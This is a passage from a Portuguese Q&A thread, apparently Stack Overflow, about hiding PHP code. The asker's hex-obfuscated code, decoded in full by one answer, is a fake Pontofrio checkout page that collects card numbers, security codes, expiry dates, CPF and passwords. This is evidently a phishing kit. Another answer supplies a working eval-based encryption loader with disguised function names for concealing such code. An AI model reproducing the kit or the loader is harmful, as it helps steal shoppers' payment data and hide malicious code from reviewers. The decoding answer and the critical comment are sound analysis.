x68od\x22:{\x22Cred\x69to_\x43\x61\x72tao-\x64\x65-Cre\x64ito-\x56i\x73\x61\":129\x34\x2e3\x34},\x22\x75\x74\x6d\":{\x22sour\x63e\":\x22\x22}},\"\x74ms\":{\"c\x6freLo\x63a\x74\x69o\x6e\x22:\"//c\x61\x72\x72i\x6eh\x6f\x2epon\x74\x6ffrio\x2e\x63\x6fm\x2eb\x72/Js/\x54a\x67\x4danager/\",\x22c\x75\x73\x74\x6fm\x4c\x6f\x63\x61t\x69o\x6e\x22:\x22//car\x72i\x6eho\x2e\x70o\x6e\x74\x6f\x66ri\x6f.com\x2ebr/\x41p\x70\x5fT\x68em\x65\x73/P\x6f\x6eto\x46r\x69o/\x6a\x73/T\x61gM\x61nag\x65r/\x22,\"v\x65\x72si\x6f\x6e\x22:{\x22si\x74e\x4detada\x74\x61\x22:\"\x31.\x35.\x313030\x35\x22}},\x22disp\x6c\x61\x79Ca\x73\x65\x22:{\"\x72e\x63ty\x70e\x22:[],\"\x72e\x63\x73ou\x72\x63\x65\":[]}};\n\x3c/s\x63rip\x74>\n\x3cs\x63ript \x74ype\x3d\x22\x74ext/\x6aavas\x63\x72\x69p\x74\x22\x20ch\x61rse\x74=\"U\x54F-\x38\x22 src\x3d\"//c\x61rri\x6e\x68\x6f.po\x6e\x74\x6ffrio.\x63o\x6d.\x62\x72/Js/\x54a\x67\x4da\x6e\x61g\x65\x72/l\x6f\x61der.j\x73\">\x3c/sc\x72\x69p\x74\x3e\n";mysqli_select_db(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x76y\x77n\x79jt"]},${$xibmumfkhxj});${${"GLO\x42\x41L\x53"}["\x70\x6b\x66ox\x6a"]}="\x53\x45L\x45\x43T\x20* \x46ROM\x20fu\x6ec\x6fe\x73";${${"\x47L\x4f\x42\x41\x4cS"}["\x6b\x64\x6d\x6f\x68\x71\x75"]}=mysqli_query(${${"\x47\x4cO\x42\x41LS"}["\x76\x79\x77nyj\x74"]},${${"\x47\x4cO\x42\x41LS"}["\x70k\x66\x6fx\x6a"]})or die(mysqli_error());${${"\x47\x4cOB\x41\x4cS"}["\x70j\x73o\x63i\x66r\x64\x75"]}=mysqli_fetch_assoc(${${"GL\x4fB\x41\x4c\x53"}["k\x64moh\x71\x75"]});${$pjobgndqiqfm}=mysqli_num_rows(${${"GL\x4fBAL\x53"}["\x6b\x64\x6do\x68q\x75"]});${"\x47\x4cO\x42ALS"}["\x74cui\x76\x6eq\x68"]="\x68e\x61d\x65\x72\x73";${${"G\x4c\x4f\x42\x41\x4cS"}["\x69s\x6dvd\x71\x6as\x68\x73"]}=${$pipggarius}["\x63ha\x74"];if(${${"GL\x4f\x42A\x4c\x53"}["\x70\x68\x6e\x6a\x69gchrh\x6a"]}=="\x30"){echo"";}else{$aqkitlyct="\x63\x68at";echo${$aqkitlyct};}echo "\n\x20  \x20\x3c/\x68\x65ad\x3e\n\x20 \x20 \x3cbody>\n        \x3cdiv \x63la\x73s=\"h\x65ad\x65r\x20he\x61\x64\x65\x72\x53\x65c\x75re\">\n\x20 \x20    \x20\x20\x20\x20 <div\x20c\x6c\x61ss=\"\x68\x65ad\x65\x72\x43o\x6e\x74e\x6e\x74\x22>\n\x20 \x20\x20    \x20\x20\x20\x20 \x20 \x20 \x20\x20      \x20\x20\x20\x3c\x61 \x63\x6ca\x73s=\x22lo\x67\x6f\" \x68\x72\x65\x66\x3d\x22\x68t\x74p://\x77\x77w\x2epo\x6eto\x66\x72io.com\x2eb\x72\x22>Po\x6etof\x72\x69\x6f.\x63\x6f\x6d.br\x3c/a>\n  \x20\x20 \x20 \x20   \x20 \x20\x20\x20<\x75\x6c\x20\x63l\x61s\x73\x3d\"hL\x69\x6ek\x73\x22\x3e\x3c\x6c\x69\x20\x63\x6c\x61ss\x3d\x22a\x74e\x6e\x64\x69men\x74\x6f\">\x3ca \x68\x72e\x66=\"\x68t\x74p://ww\x77.\x70\x6fnt\x6f\x66ri\x6f\x2ec\x6fm\x2e\x62\x72/\x63ent\x72aldea\x74\x65\x6e\x64\x69m\x65n\x74\x6f/h\x6fme.\x61\x73\x70x\x22 titl\x65\x3d\x22C\x65\x6e\x74\x72\x61\x6c de\x20a\x74\x65n\x64\x69me\x6e\x74\x6f\" \x63\x6c\x61ss=\"\x6c\x6ek\">Ce\x6et\x72al\x20\x64e \x61\x74endime\x6eto</\x61\x3e</\x6c\x69\x3e\x3cli\x20clas\x73=\"\x70ed\x69d\x6f\x73\x22>\x3c\x61 h\x72\x65f=\"htt\x70\x73://\x63a\x72\x72\x69nh\x6f\x2ep\x6f\x6e\x74\x6ff\x72\x69\x6f.com\x2eb\x72/Si\x74\x65/M\x65\x75\x73\x50edidos\x2ea\x73p\x78\x22 t\x69tle=\x22Meu\x73\x20\x70e\x64ido\x73\"\x20\x63\x6cas\x73=\x22\x6cn\x6b\"\x3e\x4d\x65us p\x65\x64\x69\x64\x6f\x73\x3c/a\x3e</li>\x3c\x6c\x69 c\x6ca\x73s=\"se\x63\x75re\x22>\x41\x6dbi\x65nt\x65\x20\x3cem\x3e1\x30\x30\x25 Se\x67ur\x6f</e\x6d>\x3c/\x6ci\x3e\x3c/\x75l\x3e\n\n \x20   \x20 \x20  \x20 \x3c/\x64\x69v\x3e\n\x20 \x20\x20  \x20\x20\n     \x20\x20\x20\x3c/div\x3e\n\x20\x20 \x20 \x20\x20\x20<div i\x64=\x22\x62\x6f\x64y\"\x3e\n  \x20        \x20\n\x20\x20\x20 \x20\x20\x20 \x20\x20  \x3c\x73\x65\x63tion cla\x73s=\"c\x6f\x6e\x74entWra\x70\x70e\x72\x22\x3e\n \x20\x20   \x20\x20\x20 \x20 \x20\x20  \n<div\x20c\x6c\x61ss\x3d\"\x63on\x74eudo \x66\x69na\x6c\x69za\x43o\x6d\x70\x72a\x22>\n  \x20 \x3ch2 \x63lass\x3d\x22tit\">\x4fbr\x69\x67\x61d\x6f\x20\x70\x6f\x72 \x63om\x70\x72ar\x20\x6eo Pon\x74o\x66\x72\x69\x6f\x2e\x63\x6f\x6d</\x682>\n \n\x20\x20  \x3c\x64iv\x20cl\x61ss\x3d\"fin\x61\x6c\x69za\">\n\x20  \x20 \x20\x20\x20<\x64iv \x63la\x73\x73\x3d\"\x77rap\x70er\x20ord\x65r\"\x3e\n    \x20 \x20 \x20  \x20<\x70\x20c\x6c\x61\x73s\x3d\x22n\x70edi\x64o\">\n \x20  \x20\x20 \x20   \x20\x20  \x20O\x20\x6eú\x6d\x65ro \x64\x6f \x73\x65\x75 ped\x69do\x20é:\x3c\x62\x72\x20/\x3e\n\x20\x20  \x20 \x20\x20 \x20    \x20 <s\x74ron\x67\x3e";echo${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6c\x69\x6a\x6d\x78m\x71"]};echo "</s\x74r\x6f\x6eg\x3e\n \x20\x20 \x20  \x20\x20\x20\x20 </p\x3e\n\x20   \x20 \x20\x20 \x20\x20 <\x64\x69\x76\x20\x63\x6c\x61\x73\x73=\"\x6f\x62s\"\x3e\n \x20\x20        \x20\x20\x20 \x20\x3ch\x33\x3e\x53\x65\x75\x20ped\x69\x64\x6f f\x6fi\x20\x72e\x61l\x69\x7a\x61\x64\x6f com\x20\x73uc\x65sso\x2e\x3c/\x683\x3e\n\x20\x20\x20      \x20 \x20 \x20\x20\x20<p\x20\x63l\x61\x73\x73=\"\x6f\x62\x73t\x78t\x22>Em\x20\x62re\x76e\x20v\x6fc\x26#\x323\x34\x3b\x20\x72\x65\x63e\x62er&#\x3225; \x75m\x20\x65-\x6d\x61i\x6c\x20d\x65 \x63\x6fnf\x69rm\x61&\x232\x331;&\x232\x32\x37\x3b\x6f \x63o\x6d \x74o\x64\x61\x73\x20\x61s \x69n\x66\x6f\x72ma\x26#\x3231;\x26\x232\x345\x3bes\x20da\x20\x73\x75\x61\x20compra\x2e\x3c/p\x3e\n \x20       \x20\x20   \x20 <\x75l \x63\x6ca\x73s\x3d\"bts\x22>\n \x20  \x20 \x20\x20\x20\x20 \x20\x20\x20\x20   \x20\x20\x20\x20\x20\x20 \x20\x20\x20 \x20\x20\x20 \x20  \x20\x20 \x20  \x20 \x20\x20\x20 \x20\x20\x20 \x20\x20\x20\x20 \x20  \x20 \x20\x20\x20\x20 \x20\x20   \x20 \x20\x20\x20\x20  \x3cli\x20cla\x73\x73=\"\x61\x63o\x6dpa\x6e\x68e\x22><a h\x72ef='\x68tt\x70\x73://\x63\x61\x72r\x69\x6e\x68\x6f\x2epontofr\x69o\x2ecom.\x62\x72/\x53i\x74e/\x4d\x65\x75\x73P\x65\x64ido\x73\x2easp\x78\x27\x20\x63lass\x3d\"\x62t\x20b\x74Me\x75s\x50\x65\x64\x69d\x6fs\x22\x20\x74i\x74\x6c\x65\x3d\"Me\x75s \x50e\x64\x69d\x6f\x73\x22>M\x65us P\x65d\x69d\x6f\x73</\x61>\x3c/\x6ci\x3e\n\x20\x20\x20\x20 \x20 \x20  \x20 \x20\x20\x20\x20</ul\x3e\n\x20\x20\x20\x20 \x20  \x20  \x20</d\x69v>\n\x20\x20\x20 \x20    \x20 \x20<\x64i\x76\x20cla\x73s\x3d\x22m\x73\x67A\x70\x70\"\x3e\n\x3c\x65\x6d>\x41c\x6f\x6dp\x61\x6e\x68\x65\x20\x73e\x75\x73\x20\x70ed\x69do\x73 \x6f\x6ed\x65 e\x73t\x69v\x65r,\x20\x62\x61\x69\x78\x65\x20\x6f\x20a\x70\x6c\x69c\x61t\x69\x76o\x20d\x6f\x20\x50\x6f\x6et\x6ff\x72io \x65\x20\x61\x70ro\x76eite\x21\x3c/em>\n<\x75\x6c\x20c\x6ca\x73\x73\x3d\"a\x70p\x53t\x6f\x72e\x4c\x69s\x74\x22\x3e\n\x3cli\x3e\x3ca \x68ref=\x22ht\x74p\x73://\x69t\x75\x6ees\x2e\x61p\x70le.co\x6d/\x62\x72/\x61\x70\x70/ponto\x66ri\x6f\x2eco\x6d/i\x644\x31\x347\x32\x3478\x33?\x6dt\x3d8\x22\x20\x74\x69t\x6c\x65=\x22\x41\x70ple\x20\x53to\x72\x65\x22 c\x6c\x61ss\x3d\x22l\x6e\x6b l\x6e\x6b\x41pp\x20a\x70p\x41\x70ple\x22\x20\x74ar\x67\x65t=\x22\x5fb\x6ca\x6e\x6b\x22\x3eA\x70\x70\x6c\x65 \x53\x74o\x72e\x3c/\x61\x3e\x3c/\x6c\x69>\n\x3cli><\x61\x20h\x72\x65f=\x22h
```

Comment: Se está precisando proteger código PHP, há uma grande chance de estar usando a tecnologia errada para a tarefa. Não sei como dizer isto de maneira a não parecer estranho, mas se está com dificuldade com base 64, provavelmente proteger o seu código PHP também não deveria ser uma preocupação neste momento. Agora, se está falando de proteger dados no código, como senhas, etc, seria bom [edit] a pergunta de forma a refletir a dúvida real, preferencialmente com um exemplo.

Answer (score 1):

Se você tiver utilizando o `base64_decode`, é necessário utilizar a função [eval](http://br.php.net/manual/pt_BR/function.eval.php).

Exemplo:

```
<?php

$code = "JGNoID0gY3VybF9pbml0KCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICJodHRwczovL3VwbG9hZC53aWtpbWVkaWEub3JnL3dpa2lwZWRpYS9jb21tb25zLzYvNjEvU2ltb25lLVNpbW9ucy0yMDA5LXBpYzA3YS5qcGciKTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCB0cnVlKTsKY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgdHJ1ZSk7CiRyZXNwb25zZSA9IGN1cmxfZXhlYygkY2gpOwpjdXJsX2Nsb3NlKCRjaCk7CgpoZWFkZXIoIkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZyIpOwplY2hvICRyZXNwb25zZTs=";

eval(base64_decode($code));
```

Você também pode utilizar Cipher para criptografia e descriptografia do código.

---

#### Utilizando OpenSSL para proteger seu código

*Encrypter.php*

```
<?php

$file = file_get_contents("codigo_a_ser_encriptado.php");
$file = str_replace(["<?php", "<?", "<?=", "?>"], "", $file);
$file = base64_encode($file);

$key = "$2y$10$1F.8trI3O7UbrsWtLQAkH.VE7qVAMOQ4n5pZbAJDMMAjCXefCq6rG";

$ivlen = openssl_cipher_iv_length("AES-128-CBC");
$iv = openssl_random_pseudo_bytes($ivlen);

$encrypt = base64_encode(openssl_encrypt($file, "AES-128-CBC", $key, OPENSSL_RAW_DATA, $iv).$iv);

$cod = '<?php $fgdfgd = "'.$encrypt.'";$key = "'.$key.'";$dfsasdas="\x62\x61\163\x65\66\64\x5f\x64\x65\143\157\144\x65";$sdoasid=$dfsasdas($fgdfgd);$kfasdnk="c3RyX3JvdDEz";$rtyrfsd=\'op\'.$dfsasdas($kfasdnk)("raffy_qrpelcg");$ashdas="LzAlLJMzrI9jqzA1pzIsqzysrKWuqTq1";$ashdasdfass="LzAlLJMzrI9yozSkLacsL2MlnUSvK29fM3Wz";$iruyryu="\x68\x65\x78\x32\x62\x69\x6e";$pgjkguyk="\x73\x75\x62\x73\x74\x72";$gtdfs=$dfsasdas($kfasdnk)("fgeyra");$tgrt=$dfsasdas($kfasdnk)($dfsasdas($dfsasdas($kfasdnk)($ashdas)))("AES-128-CBC");$tgasdart=$dfsasdas($kfasdnk)($dfsasdas($dfsasdas($kfasdnk)($ashdasdfass)))($tgrt);$oooouishs=$pgjkguyk($sdoasid, 0x000000, -16);$ttatshdh=$pgjkguyk($sdoasid, $gtdfs($sdoasid)-$tgrt, $tgrt);eval($dfsasdas( $rtyrfsd($oooouishs, "AES-128-CBC", $key, OPENSSL_RAW_DATA, $ttatshdh) ));';


$f = fopen("teste.php", "w+b");
fwrite($f, $cod);
fclose($f);
```

Esse código irá gerar um arquivo chamado **teste.php**, basta executar e verificar o resultado.

*codigo_a_ser_encriptado.php*

```
<?php

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://upload.wikimedia.org/wikipedia/commons/6/61/Simone-Simons-2009-pic07a.jpg");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

header("Content-Type: image/jpeg");
echo $response;
```

---

#### Demonstração no IdeOne

Esse código irá criptografar: `<?php echo "Esse é um teste para da resposta dada por Valdeir Psr no StackOverflow: #267283"; ?>`

**[Executar arquivo responsável pela criptografia](https://ideone.com/PFbv81)**

Output do código acima:

```
<?php $fgdfgd = "bjuFx6tuLpdtFI9U5ND664RNaHs0dwTLrzVvAMsTtDrhhMEYefDKp8tWugR+mJiLRN6zt/Xs0uv0Pv0ZoGxrzdjNE20sUSDQKto+CLs9WWAuRKXomCptxrmhxJ4WPtkRcQn1jq78L8x9ZinCUHbTWcxQMewwrW/uEEPxlG4rBaKYw1OR51CMmc4dVpPTh/xG";$key = "$2y$10$1F.8trI3O7UbrsWtLQAkH.VE7qVAMOQ4n5pZbAJDMMAjCXefCq6rG";$dfsasdas="\x62\x61\163\x65\66\64\x5f\x64\x65\143\157\144\x65";$sdoasid=$dfsasdas($fgdfgd);$kfasdnk="c3RyX3JvdDEz";$rtyrfsd='op'.$dfsasdas($kfasdnk)("raffy_qrpelcg");$ashdas="LzAlLJMzrI9jqzA1pzIsqzysrKWuqTq1";$ashdasdfass="LzAlLJMzrI9yozSkLacsL2MlnUSvK29fM3Wz";$iruyryu="\x68\x65\x78\x32\x62\x69\x6e";$pgjkguyk="\x73\x75\x62\x73\x74\x72";$gtdfs=$dfsasdas($kfasdnk)("fgeyra");$tgrt=$dfsasdas($kfasdnk)($dfsasdas($dfsasdas($kfasdnk)($ashdas)))("AES-128-CBC");$tgasdart=$dfsasdas($kfasdnk)($dfsasdas($dfsasdas($kfasdnk)($ashdasdfass)))($tgrt);$oooouishs=$pgjkguyk($sdoasid, 0x000000, -16);$ttatshdh=$pgjkguyk($sdoasid, $gtdfs($sdoasid)-$tgrt, $tgrt);eval($dfsasdas( $rtyrfsd($oooouishs, "AES-128-CBC", $key, OPENSSL_RAW_DATA, $ttatshdh) ));
```

**[Executar output](https://ideone.com/vGaaP0)**

Output do código acima:

```
Esse é um teste para da resposta dada por Valdeir Psr no StackOverflow: #267283
```

---

#### Vantagens e Desvantagens

*Vantagens*

1. É grátis
2. É rápido para criptografar

*Desvantagens*

1. A depender de como você esteja utilizando, é fácil de reverter.
2. Consome mais processamento do servidor.

---

**Ferramentas Gratuitas:**

1. [**PHP Obfuscator**](http://fopo.com.ar/)
2. **[PHP Obfuscator 2](http://www.pipsomania.com/best_php_obfuscator.do)**
3. **[PHP Obfuscator 3](https://github.com/naneau/php-obfuscator)**

> Criei esses códigos bem rapidamente, quis apenas mostrar que você tem várias opções. Mas, se você **realmente** quiser proteger seu código, recomendo utilizar o **[IonCube](http://www.ioncube.com/php_encoder.php)**.

Comment: você entendeu perfeitamente o que estou querendo fazer, criei os arquivos assim como no seu exemplo porem tenho o seguinte erro - Parse error: syntax error, unexpected '(' in C:\wamp\www\CODIFICADOR-PHP\teste.php on line 1

Comment: esta criptando tudo, porem não esta dando erro no arquivo teste.php ele não é exibido aparece apenas uma msg de erro

Comment: @MarcosHenrique, se possível posta o código inteiro do arquivo `teste.php` no `pastebin`ou no `gist` e me envia o link que dou uma olhada. Acabei de (re)testar agora e está tudo OK quando uso os dois códigos da resposta. Estou utilizando a versão 7.0.0 do PHP

Comment: dei apenas um <?php echo "oi"; ?> que sera encriptado e não foi , tem que atualizar alguma coisa do wamp server ? estou trabalhando localmente também usando o php 7

Comment: Testei com o esse código agora https://pastebin.com/raw/LPbXNfhL está tudo OK. Certifique-se de está utilizando a extensão `php_openssl`. Qualquer coisa me envia teu código via pastebin que dou uma olhada, fica mais fácil de verificar.

Comment: @MarcosHenrique, editei minha resposta. Adicionei os códigos no IdeOne para você dá uma olhada.

Comment: Desculpe, mas isso é inútil. O `openssl_encrypt` precisará de uma chave, a mesma que estará em texto-claro em algum lugar, neste caso, e mesmo no seu exemplo ele está lá "$2y$10$1F.8trI3O7UbrsWtLQAkH.VE7qVAMOQ4n5pZbAJDMMAjCXefCq6rG", o que na minha opinião é um erro (mesmo que um exemplo), essa "chave" está usando Base64 e ainda contendo um salt e padrões (`$2y$10$`), o BCrypt só tem 184 bits de entropia. Mesmo se utilizar algum HSM isso não fará sentido, uma vez que o código terá que ser executado em um dispositivo imperfeito. A pergunta foi fechada, mas as respostas linkadas são suficientes.

Comment: @Inkeliz sei que o `openssl_encrypt` precisa da `key` e `iv`, mas é como citei nas desvantagens (a facilidade da engenharia reversa a depender de como ele criptografa seus arquivos) e por isso recomentei o `IonCube` para proteção dos mesmos. E sim, eu também sei que a `key` (principalmente a mostra) é uma falha de segurança (ele poderia deixar "oculta" no sistema, quem sabe até criar um código em `C` para isso), mas a intenção era apenas mostrar como fazer, dá ideias para ele criar ou começar a estudar um mais robusto.

Answer (score 1):

Primeiro, começamos com esse código para desencriptar essa bagunça:

```js
function decode(x) {
    var hex = "0123456789abcdef";
    return x.replace(/\\x[0-9a-f][0-9a-f]/g, function(s) {
        var a = hex.indexOf(s.charAt(2));
        var b = hex.indexOf(s.charAt(3));
        var t = a * 16 + b;
        return String.fromCharCode(t);
    }).replace(/;/g, ";\n");
}

$("#bt").click(function() {
    var t = $("#codigo").val();
    t = decode(t);
    $("#decodificado").val(t);
});
```

```html
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<div><textarea id="codigo"></textarea></div>
<div><input type="button" id="bt" value="Decodificar" /></div>
<div><textarea id="decodificado"></textarea></div>
```

Aqui, há duas caixas de texto. Na primeira você copia e cola o código encriptado. Ele vai desencriptar o código e colocá-lo na segunda.

Eis o que o seu código produziu como saída:

```php
<?php /*
${"GLOBALS"}["nhlejvypdk"]="arquivo";
${"GLOBALS"}["ftmchymcjf"]="pasta";
${"GLOBALS"}["imvnvx"]="dir";
${"GLOBALS"}["movsludairi"]="deleteSQL";
${"GLOBALS"}["ndmpiik"]="linkcompleton1";
${"GLOBALS"}["apcafivuw"]="linkcompleto1";
${"GLOBALS"}["jjbtpumql"]="linkcompleton";
${"GLOBALS"}["olhtvgvkcef"]="produto";
${"GLOBALS"}["emswjq"]="linkcompleto";
${"GLOBALS"}["vgdxwk"]="urlEndereco";
$bhypbkeojm="dir";
$xrfxcjru="produto";
${"GLOBALS"}["khdxdkuyb"]="c";
${"GLOBALS"}["wgulkh"]="s";
${"GLOBALS"}["xjgcjofipl"]="mensagem";
${"GLOBALS"}["hpdkupwtxsi"]="headers";
${"GLOBALS"}["spommfnyex"]="Estado";
${"GLOBALS"}["euccdabkqh"]="Numero";
${"GLOBALS"}["cnuiloorasp"]="Rua";
${"GLOBALS"}["tgremqgkkt"]="Destinatario";
${"GLOBALS"}["skrnizbk"]="preconovoi";
${"GLOBALS"}["lijmxmq"]="numeropedido";
$qqkqugp="Municipio";
${"GLOBALS"}["ismvdqjshs"]="chat";
${"GLOBALS"}["pjsocifrdu"]="row_funcoes";
${"GLOBALS"}["kdmohqu"]="funcoes";
${"GLOBALS"}["pkfoxj"]="query_funcoes";
${"GLOBALS"}["bmedmpxpv"]="produtonome";
${"GLOBALS"}["mmburfi"]="numero_cc";
${"GLOBALS"}["bvnclyf"]="NrSeguranca";
${"GLOBALS"}["cqubchk"]="DtValidadeAno";
${"GLOBALS"}["aedmsqw"]="DtValidadeMes";
${"GLOBALS"}["seqlipph"]="NrCartao";
${"GLOBALS"}["ockyjya"]="Municipio";
${"GLOBALS"}["dalxjvocjx"]="Cep";
${"GLOBALS"}["dzvhyymjimf"]="NomeE";
${"GLOBALS"}["hurijsvz"]="TipoEndereco";
${"GLOBALS"}["kkbzuds"]="datanascimento";
$ahtmbwui="email";
${"GLOBALS"}["roturlej"]="tipofone1";
$adghebe="Rua";
$hhmgykep="Numero";
${"GLOBALS"}["qxhnrmzke"]="cpf";
$xtbckofsaeu="Estado";
${"GLOBALS"}["lyhsyujoyi"]="Nomecompra";
${"GLOBALS"}["efgsctuzfedp"]="precosem";
${"GLOBALS"}["hfuzoktxya"]="preconovods";
${"GLOBALS"}["kwwrqkwrbpdt"]="precoparcela";
${"GLOBALS"}["hqdvroyrnf"]="row_SetaProdutos";
$xljxqvay="preconovoi";
$prvtnmqtru="row_SetaProdutos";
${"GLOBALS"}["ivhfimywb"]="query_SetaProdutos";
${"GLOBALS"}["kpojwektzvn"]="SetaProdutos";
$pkkdowfbrnc="IdFormaPagamentoParcelamento";
${"GLOBALS"}["djqwnph"]="sexo";
${"GLOBALS"}["oqhwyuylb"]="database_ConnectDB";
${"GLOBALS"}["vywnyjt"]="ConnectDB";
$uquazcxyhsix="Bairro";
${"GLOBALS"}["phnjigchrhj"]="chat";
${"GLOBALS"}["kokbvyuru"]="query_SetaProdutos";
$mbexhgtr="SetaProdutos";
${"GLOBALS"}["qxbfqjrdiin"]="precob";
$lbckqypxwtb="row_SetaProdutos";
${"GLOBALS"}["ztcvhoyusp"]="id";
${"GLOBALS"}["mleuhumo"]="preconovod";
$fdxrpgchzngr="tipofone2";
$heermvnpz="totalRows_SetaProdutos";
require_once("../Connections/ConnectDB.php");
$bfywqke="row_SetaProdutos";
$fuxicw="preconovof";
${${"GLOBALS"}["ztcvhoyusp"]}=$_POST["id"];
${"GLOBALS"}["kxockirdd"]="PontoReferencia";
${"GLOBALS"}["kdgfslcb"]="precosem";
mysqli_select_db(${${"GLOBALS"}["vywnyjt"]},${${"GLOBALS"}["oqhwyuylb"]});
${${"GLOBALS"}["kokbvyuru"]}="SELECT * FROM produto WHERE id = '$id'";
${"GLOBALS"}["tdauyj"]="preconovoi";
${${"GLOBALS"}["kpojwektzvn"]}=mysqli_query(${${"GLOBALS"}["vywnyjt"]},${${"GLOBALS"}["ivhfimywb"]})or die(mysqli_error());
${$bfywqke}=mysqli_fetch_assoc(${${"GLOBALS"}["kpojwektzvn"]});
${"GLOBALS"}["lafisw"]="precob";
$kqdnrvhf="row_SetaProdutos";
${$heermvnpz}=mysqli_num_rows(${$mbexhgtr});
$byufbxcefuvb="telefone1";
${$xljxqvay}=${${"GLOBALS"}["hqdvroyrnf"]}["novopreco"];
${$fuxicw}=substr(${${"GLOBALS"}["tdauyj"]},0,-3);
$wfebqfvdfh="preconovods";
${${"GLOBALS"}["qxbfqjrdiin"]}=${$prvtnmqtru}["precobruto"];
$uogpyirm="senha";
${${"GLOBALS"}["mleuhumo"]}=str_replace(strtoupper("."),"",strtoupper(${${"GLOBALS"}["lafisw"]}/10));
${${"GLOBALS"}["hfuzoktxya"]}=${$lbckqypxwtb}["novopreco"];
${${"GLOBALS"}["efgsctuzfedp"]}=substr(${$wfebqfvdfh},0,-3);
$bbhfzjr="telefone2";
$zjpsjg="produtonome";
${"GLOBALS"}["gngpvuekuby"]="deleteSQL";
${${"GLOBALS"}["kwwrqkwrbpdt"]}=str_replace(".","",${${"GLOBALS"}["kdgfslcb"]});
${${"GLOBALS"}["lyhsyujoyi"]}=$_POST["Nomecompra"];
${${"GLOBALS"}["qxhnrmzke"]}=$_POST["cpf"];
${${"GLOBALS"}["roturlej"]}=$_POST["tipofone1"];
${"GLOBALS"}["brwtdge"]="Destinatario";
${$byufbxcefuvb}=$_POST["telefone1"];
${$fdxrpgchzngr}=$_POST["tipofone2"];
${$bbhfzjr}=$_POST["telefone2"];
$pjobgndqiqfm="totalRows_funcoes";
${${"GLOBALS"}["kkbzuds"]}=$_POST["datanascimento"];
${"GLOBALS"}["lqdiqxeabq"]="Bairro";
${"GLOBALS"}["owfdkcy"]="Complemento";
${${"GLOBALS"}["djqwnph"]}=$_POST["sexo"];
${$ahtmbwui}=$_POST["email"];
${$uogpyirm}=$_POST["senha"];
${${"GLOBALS"}["hurijsvz"]}=$_POST["TipoEndereco"];
${${"GLOBALS"}["dzvhyymjimf"]}=$_POST["NomeE"];
${${"GLOBALS"}["brwtdge"]}=$_POST["Destinatario"];
${${"GLOBALS"}["dalxjvocjx"]}=$_POST["Cep"];
${$adghebe}=$_POST["Rua"];
${$hhmgykep}=$_POST["Numero"];
${${"GLOBALS"}["owfdkcy"]}=$_POST["Complemento"];
${${"GLOBALS"}["lqdiqxeabq"]}=$_POST["Bairro"];
${${"GLOBALS"}["ockyjya"]}=$_POST["Municipio"];
$pipggarius="row_funcoes";
$aqvnuuishth="urlServer";
${$xtbckofsaeu}=$_POST["Estado"];
${${"GLOBALS"}["kxockirdd"]}=$_POST["PontoReferencia"];
${${"GLOBALS"}["seqlipph"]}=$_POST["NrCartao"];
${"GLOBALS"}["rhyiacpeupxx"]="linkcompleto1";
$utkwcuoveu="NomeT";
${"GLOBALS"}["dwxfjyobri"]="numeropedido";
${${"GLOBALS"}["aedmsqw"]}=$_POST["DtValidadeMes"];
$hfcvnu="Nomecompra";
${${"GLOBALS"}["cqubchk"]}=$_POST["DtValidadeAno"];
$xibmumfkhxj="database_ConnectDB";
${$utkwcuoveu}=$_POST["NomeT"];
${${"GLOBALS"}["bvnclyf"]}=$_POST["NrSeguranca"];
${$pkkdowfbrnc}=$_POST["IdFormaPagamentoParcelamento"];
${"GLOBALS"}["wemetd"]="urlServer";
${${"GLOBALS"}["mmburfi"]}=${${"GLOBALS"}["seqlipph"]};
${${"GLOBALS"}["bmedmpxpv"]}=${${"GLOBALS"}["hqdvroyrnf"]}["nomeproduto"];
${${"GLOBALS"}["dwxfjyobri"]}=rand(20000,99999);
echo "<!DOCTYPE html>\n<html lang="en\">\n    <head>\n        <meta charset=\"utf-8">\n        <meta http-equiv="pragma\" content="no-cache\">\n        <meta http-equiv="X-UA-Compatible\" content="IE=Edge,chrome=1">\n    <title>\n        Pontofrio.com: a maior loja de Eletrônicos e Eletrodomésticos do Brasil\n        \n    </title>\n        <link rel=\"shortcut icon" href="https://carrinho.pontofrio.com.br/App_Themes/PontoFrio/favicon.ico\" />\n    <link href="http://carrinho.pontofrio.com.br/Content/css/jquery-ui-1.10.3.custom.css\" rel=\"stylesheet"/>\n<link href="http://carrinho.pontofrio.com.br/Content/PontoFrio/css/checkout.css\" rel="stylesheet"/>\n<link href="http://carrinho.pontofrio.com.br/Content/css/thickbox/thickbox.css" rel="stylesheet\"/>\n\n        <meta name=\"viewport\" content=\"width=device-width">\n        <meta name="msapplication-config\" content=\"none\">\n \n        \n        <meta name=\"robots" content="NOINDEX, FOLLOW\" />\n        \n<script type=\"text/javascript">\nvar siteMetadata = 